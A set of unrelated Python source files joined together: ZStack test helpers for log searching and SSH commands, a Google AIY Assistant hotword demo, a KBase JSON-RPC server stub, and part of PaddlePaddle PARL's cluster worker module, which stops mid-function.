if line_match:
return True
return False
def lib_count_in_local_management_server_log(timestamp, *keywords):
datetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
cmd = 'grep "%s" %s' % (datetime, lib_get_local_management_server_log_path().strip())
try:
out = shell.call(cmd)
except:
return 0
match = 0
for line in out.splitlines():
line_match = True
for keyword in keywords:
if line.find(keyword) < 0:
line_match = False
break
if line_match:
match += 1
return match
def lib_find_in_remote_management_server_log(node_ip, node_username, node_password, timestamp, *keywords):
datetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
if lib_get_remote_management_server_log_path(node_ip, node_username, node_password) == False:
return False
else:
cmd = 'grep "%s" %s | cat' % (datetime, lib_get_remote_management_server_log_path(node_ip, node_username, node_password).strip())
try:
out = lib_execute_ssh_cmd(node_ip, node_username, node_password, cmd, 180)
except:
return False
for line in out.splitlines():
line_match = True
for keyword in keywords:
if line.find(keyword) < 0:
line_match = False
break
if line_match:
return True
return False
def lib_update_instance_offering(offering_uuid, cpuNum = None, cpuSpeed = None, \
memorySize = None, name = None, \
volume_iops = None, volume_bandwidth = None, \
net_outbound_bandwidth = None, net_inbound_bandwidth = None):
systemTags = None
updated_offering_option = test_util.InstanceOfferingOption()
if cpuNum:
updated_offering_option.set_cpuNum(cpuNum)
#if cpuSpeed:
# updated_offering_option.set_cpuSpeed(cpuSpeed)
if memorySize:
updated_offering_option.set_memorySize(memorySize)
if name:
updated_offering_option.set_name(name)
if volume_iops:
systemTags += "volumeTotalIops::%d," %(volume_iops)
if volume_bandwidth:
systemTags += "volumeTotalIops::%d," %(volume_bandwidth)
if net_outbound_bandwidth:
systemTags += "volumeTotalIops::%d," %(net_outbound_bandwidth)
if net_inbound_bandwidth:
systemTags += "volumeTotalIops::%d," %(net_inbound_bandwidth)
if systemTags:
systemTags = systemTags.rstrip(',')
return vm_ops.update_instance_offering(updated_offering_option, offering_uuid, systemTags)
version_is_mevoco = None
def lib_check_version_is_mevoco():
global version_is_mevoco
if version_is_mevoco != None:
return version_is_mevoco
try:
lic_ops.get_license_info()
version_is_mevoco = True
except:
version_is_mevoco = False
return version_is_mevoco
version_is_mevoco_1_8 = None
def lib_check_version_is_mevoco_1_8():
global version_is_mevoco_1_8
if version_is_mevoco_1_8 != None:
return version_is_mevoco_1_8
if shell.call('zstack-ctl status').find('version: 1.8') >= 0:
version_is_mevoco_1_8 = True
else:
version_is_mevoco_1_8 = False
return version_is_mevoco_1_8
def lib_get_host_cpu_prometheus_data(mn_ip, end_time, interval, host_uuid):
cmd = '/usr/bin/zstack-cli LogInByAccount accountName=admin password=password'
if not lib_execute_ssh_cmd(mn_ip, 'root', 'password', cmd):
test_util.test_fail('zstack-cli login failed')
cmd = """/usr/bin/zstack-cli PrometheusQueryPassThrough endTime=%s relativeTime=%s expression='collectd:collectd_cpu_percent{hostUuid=\\"%s\\",type=\\"user\\"}'""" % (end_time, interval, host_uuid)
rsp = lib_execute_ssh_cmd(mn_ip, 'root', 'password', cmd)
if not rsp:
test_util.test_fail('%s failed' % (cmd))
return rsp
def lib_get_file_size(host, file_path):
command = "du -sb %s | awk '{print $1}'" % file_path
eout = ''
try:
if host.sshPort != None:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password, port=int(host.sshPort))
else:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password)
test_util.test_logger('[file:] %s was found in [host:] %s' % (file_path, host.managementIp))
return out
except:
#traceback.print_exc(file=sys.stdout)
test_util.test_logger('Fail to execute: ssh [host:] %s with [username:] %s and [password:] %s to get size of [file:] %s . This might be expected behavior.'% (host.managementIp, host.username, host.password, file_path))
test_util.test_logger('ssh execution stderr output: %s' % eout)
test_util.test_logger(linux.get_exception_stacktrace())
return 0
def ip2num(ip):
ip=[int(x) for x in ip.split('.')]
return ip[0] <<24 | ip[1]<<16 | ip[2]<<8 |ip[3]
def num2ip(num):
return '%s.%s.%s.%s' %( (num & 0xff000000) >>24,
(num & 0x00ff0000) >>16,
(num & 0x0000ff00) >>8,
num & 0x000000ff )
def get_ip(start_ip, end_ip):
start = ip2num(start_ip)
end = ip2num(end_ip)
return [ num2ip(num) for num in range(start, end+1) if num & 0xff ]
|
assistant_library_with_snowboy_demo.py
|
#!/usr/bin/env python3
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run a recognizer using the Google Assistant Library with button support.
The Google Assistant Library has direct access to the audio API, so this Python
code doesn't need to record audio. Hot word detection "OK, Google" is supported.
It is available for Raspberry Pi 2/3 only; Pi Zero is not supported.
"""
import logging
import platform
import sys
import threading
import aiy.assistant.auth_helpers
from aiy.assistant.library import Assistant
import aiy.voicehat
from google.assistant.library.event import EventType
import mod.snowboydecoder as snowboydecoder
if len(sys.argv) == 1:
print("Error: need to specify model name")
print("Usage: python demo.py your.model")
sys.exit(-1)
model = sys.argv[1]
logger = logging.getLogger("main")
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
)
class MyAssistant(object):
"""An assistant that runs in the background.
The Google Assistant Library event loop blocks the running thread entirely.
To support the button trigger, we need to run the event loop in a separate
thread. Otherwise, the on_button_pressed() method will never get a chance to
be invoked.
"""
def __init__(self):
self._task = threading.Thread(target=self._run_task)
self._hotword = threading.Thread(target=self._run_hotword)
self._can_start_conversation = False
self._assistant = None
def start(self):
"""Starts the assistant.
Starts the assistant event loop and begin processing events.
"""
self._task.start()
self._hotword.start()
def _run_task(self):
credentials = aiy.assistant.auth_helpers.get_assistant_credentials()
with Assistant(credentials) as assistant:
self._assistant = assistant
for event in assistant.start():
self._process_event(event)
def _run_hotword(self):
detector = snowboydecoder.HotwordDetector(model, sensitivity=0.5)
with aiy.audio.get_recorder():
while True:
if self._can_start_conversation:
detector.start(detected_callback=self._on_button_pressed,
interrupt_check=lambda: not(self._can_start_conversation),
sleep_time=0.03)
detector.terminate()
def _process_event(self, event):
logger.debug(event)
status_ui = aiy.voicehat.get_status_ui()
if event.type == EventType.ON_START_FINISHED:
status_ui.status('ready')
self._can_start_conversation = True
# Start the voicehat button trigger.
aiy.voicehat.get_button().on_press(self._on_button_pressed)
if sys.stdout.isatty():
print('Say "OK, Google" or press the button, then speak. '
'Press Ctrl+C to quit...')
elif event.type == EventType.ON_CONVERSATION_TURN_STARTED:
self._can_start_conversation = False
status_ui.status('listening')
elif event.type == EventType.ON_END_OF_UTTERANCE:
status_ui.status('thinking')
elif (event.type == EventType.ON_CONVERSATION_TURN_FINISHED
or event.type == EventType.ON_CONVERSATION_TURN_TIMEOUT
or event.type == EventType.ON_NO_RESPONSE):
status_ui.status('ready')
self._can_start_conversation = True
elif event.type == EventType.ON_ASSISTANT_ERROR and event.args and event.args['is_fatal']:
sys.exit(1)
def _on_button_pressed(self):
# Check if we can start a conversation. 'self._can_start_conversation'
# is False when either:
# 1. The assistant library is not yet ready; OR
# 2. The assistant library is already in a conversation.
if self._can_start_conversation:
self._assistant.start_conversation()
def main():
if platform.machine() == 'armv6l':
print('Cannot run hotword demo on Pi Zero!')
exit(-1)
MyAssistant().start()
if __name__ == '__main__':
main()
|
MyContigFilter3Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from MyContigFilter3.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MyContigFilter3'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MyContigFilter3.MyContigFilter3Impl import MyContigFilter3 # noqa @IgnorePep8
impl_MyContigFilter3 = MyContigFilter3(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MyContigFilter3'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MyContigFilter3.filter_contigs,
name='MyContigFilter3.filter_contigs',
types=[dict])
self.method_authentication['MyContigFilter3.filter_contigs'] = 'required' # noqa
self.rpc_service.add(impl_MyContigFilter3.status,
name='MyContigFilter3.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MyContigFilter3 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
worker.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cloudpickle
import multiprocessing
import os
import psutil
import signal
import socket
import subprocess
import sys
import tempfile
import time
import threading
import warnings
import zmq
from datetime import datetime
import parl
from parl.utils import get_ip_address, to_byte, to_str, logger, _IS_WINDOWS, kill_process
from parl.remote import remote_constants
from parl.remote.message import InitializedWorker
from parl.remote.status import WorkerStatus
from parl.remote.zmq_utils import create_server_socket, create_client_socket
from parl.remote.grpc_heartbeat import HeartbeatServerThread, HeartbeatClientThread
from six.moves import queue
from parl.remote.utils import get_version
class Worker(object):
"""Worker provides the cpu computation resources for the cluster.
A worker node is connected to the master node and will send its
computation resources information to the master node. When a worker
node is created, it will start `cpu_num` empty jobs and these jobs'
ip addresses will be send to the master node. Further, when an old
job is killed, worker will start a new job and send the new job ip
address to the master node.
To start a worker, we use the following xparl command line api:
.. code-block:: python
xparl connect --address localhost:1234 --cpu_num 8
Attributes:
master_address (str): Master's ip address.
request_master_socket (zmq.Context.socket): A socket which sends job
address to the master node.
reply_job_socket (zmq.Context.socket): A socket which receives
job_address from the job.
remove_job_socket (zmq.Context.socket): A socket that receives commands to remove the job from jobs immediately.
Used to remove the dead job immediately and allocate a new job
instead of waiting for the heartbeat failure.
job_buffer (str): A buffer that stores initialized jobs for providing new jobs in a short time.
Args:
master_address (str): IP address of the master node.
cpu_num (int): Number of cpu to be used on the worker.
"""
def __init__(self, master_address, cpu_num=None, log_server_port=None):
self.lock = threading.Lock()
self.ctx = zmq.Context.instance()
self.master_address = master_address
self.master_is_alive = True
self.worker_is_alive = True
self.worker_status = None # initialized at `self._create_jobs`
self._set_cpu_num(cpu_num)
self.job_buffer = queue.Queue(maxsize=self.cpu_num)
self._create_sockets()
self.check_env_consistency()
# create log server
self.log_server_proc, self.log_server_address = self._create_log_server(
port=log_server_port)
# create a thread that waits commands from the job to kill the job.
self.remove_job_thread = threading.Thread(
target=self._reply_remove_job)
self.remove_job_thread.setDaemon(True)
self.remove_job_thread.start()
self._create_jobs()
# create a thread that initializes jobs and adds them into the job_buffer
job_thread = threading.Thread(target=self._fill_job_buffer)
job_thread.setDaemon(True)
job_thread.start()
thread = threading.Thread(target=self._update_worker_status_to_master)
thread.setDaemon(True)
thread.start()
def _set_cpu_num(self, cpu_num=None):
"""set useable cpu number for worker"""
if cpu_num is not None:
assert isinstance(
cpu_num, int
), "cpu_num should be INT type, please check the input type."
self.cpu_num = cpu_num
else:
self.cpu_num = multiprocessing.cpu_count()
def check_env_consistency(self):
'''Verify that the parl & python version as well as some other packages in 'worker' process
matches that of the 'master' process'''
self.request_master_socket.send_multipart(
[remote_constants.CHECK_VERSION_TAG])
message = self.request_master_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.NORMAL_TAG:
worker_parl_version = parl.__version__
worker_python_version_major = str(sys.version_info.major)
worker_python_version_minor = str(sys.version_info.minor)
assert worker_parl_version == to_str(message[1]) and worker_python_version_major == to_str(message[2])\
and worker_python_version_minor == to_str(message[3]),\
'''Version mismatch: the "master" is of version "parl={}, python={}.{}". However, \
"parl={}, python={}.{}"is provided in your environment.'''.format(
to_str(message[1]), to_str(message[2]), to_str(message[3]),
worker_parl_version, worker_python_version_major, worker_python_version_minor
)
worker_pyarrow_version = str(get_version('pyarrow'))
master_pyarrow_version = to_str(message[4])
if worker_pyarrow_version != master_pyarrow_version:
if master_pyarrow_version == 'None':
error_message = """"pyarrow" is provided in your current enviroment, however, it is not \
found in "master"'s environment. To use "pyarrow" for serialization, please install \
"pyarrow={}" in "master"'s environment!""".format(worker_pyarrow_version)
elif worker_pyarrow_version == 'None':
error_message = """"pyarrow" is provided in "master"'s enviroment, however, it is not \
found in your current environment. To use "pyarrow" for serialization, please install \
"pyarrow={}" in your current environment!""".format(master_pyarrow_version)
else:
error_message = '''Version mismatch: the 'master' is of version 'pyarrow={}'. However, \
'pyarrow={}'is provided in your current environment.'''.format(
master_pyarrow_version, worker_pyarrow_version)
raise Exception(error_message)
else:
raise NotImplementedError
def _create_sockets(self):
"""Each worker maintains four sockets:
(1) request_master_socket: sends job address to master node.
(2) reply_job_socket: receives job_address from subprocess.
(3) remove_job_socket : receives commands to remove the job from jobs immediately.
Used to remove the dead job immediately and allocate a new job
instead of waiting for the heartbeat failure.
(4) reply_log_server_socket: receives log_server_heartbeat_address from subprocess.
When a job starts, a new heartbeat socket is created to receive
heartbeat signals from the job.
"""
self.worker_ip = get_ip_address()
# request_master_socket: sends job address to master
self.request_master_socket = self.ctx.socket(zmq.REQ)
self.request_master_socket.linger = 0
# wait for 0.5 second to check whether master is started
self.request_master_socket.setsockopt(zmq.RCVTIMEO, 500)
self.request_master_socket.connect("tcp://" + self.master_address)
# reply_job_socket: receives job_address from subprocess
self.reply_job_socket = self.ctx.socket(zmq.REP)
self.reply_job_socket.linger = 0
reply_job_port = self.reply_job_socket.bind_to_random_port("tcp://*")
self.reply_job_address = "{}:{}".format(self.worker_ip, reply_job_port)
# remove_job_socket
self.remove_job_socket = self.ctx.socket(zmq.REP)
self.remove_job_socket.linger = 0
remove_job_port = self.remove_job_socket.bind_to_random_port("tcp://*")
self.remove_job_address = "{}:{}".format(self.worker_ip,
remove_job_port)
# reply_log_server_socket: receives log_server_heartbeat_address from subprocess
self.reply_log_server_socket, reply_log_server_port = create_server_socket(
self.ctx)
self.reply_log_server_address = "{}:{}".format(self.worker_ip,
reply_log_server_port)
def _create_jobs(self):
"""Create jobs and send a instance of ``InitializedWorker`` that contains the worker information to the master."""
try:
self.request_master_socket.send_multipart(
[remote_constants.WORKER_CONNECT_TAG])
_ = self.request_master_socket.recv_multipart()
except zmq.error.Again as e:
logger.error("Can not connect to the master, "
"please check if master is started.")
self.master_is_alive = False
return
initialized_jobs = self._init_jobs(job_num=self.cpu_num)
self.request_master_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)
def master_heartbeat_exit_callback_func():
logger.warning(
"[Worker] lost connection with the master, will exit reply heartbeat for master."
)
if self.worker_status is not None:
self.worker_status.clear()
self.log_server_proc.kill()
self.log_server_proc.wait()
# exit the worker
self.exit()
self.master_heartbeat_thread = HeartbeatServerThread(
heartbeat_exit_callback_func=master_heartbeat_exit_callback_func)
self.master_heartbeat_thread.setDaemon(True)
self.master_heartbeat_thread.start()
self.master_heartbeat_address = self.master_heartbeat_thread.get_address(
)
logger.set_dir(
os.path.expanduser('~/.parl_data/worker/{}'.format(
self.master_heartbeat_address.replace(':', '_'))))
logger.info("[Worker] Connect to the master node successfully. "
"({} CPUs)".format(self.cpu_num))
for job in initialized_jobs:
job.worker_address = self.master_heartbeat_address
initialized_worker = InitializedWorker(self.master_heartbeat_address,
initialized_jobs, self.cpu_num,
socket.gethostname())
self.request_master_socket.send_multipart([
remote_constants.WORKER_INITIALIZED_TAG,
cloudpickle.dumps(initialized_worker)
])
_ = self.request_master_socket.recv_multipart()
self.worker_status = WorkerStatus(self.master_heartbeat_address,
initialized_jobs, self.cpu_num)
def _fill_job_buffer(self):
"""An endless loop that adds initialized job into the job buffer"""
initialized_jobs = []
while self.worker_is_alive:
if self.job_buffer.full() is False:
job_num = self.cpu_num - self.job_buffer.qsize()
if job_num > 0:
initialized_jobs = self._init_jobs(job_num=job_num)
for job in initialized_jobs:
self.job_buffer.put(job)
time.sleep(0.02)
self.exit()
def _init_jobs(self, job_num):
"""Create jobs.
Args:
job_num(int): the number of jobs to create.
"""
job_file = __file__.replace('worker.pyc', 'job.py')
job_file = job_file.replace('worker.py', 'job.py')
command = [
sys.executable, job_file, "--worker_address",
self.reply_job_address, "--log_server_address",
self.log_server_address
]
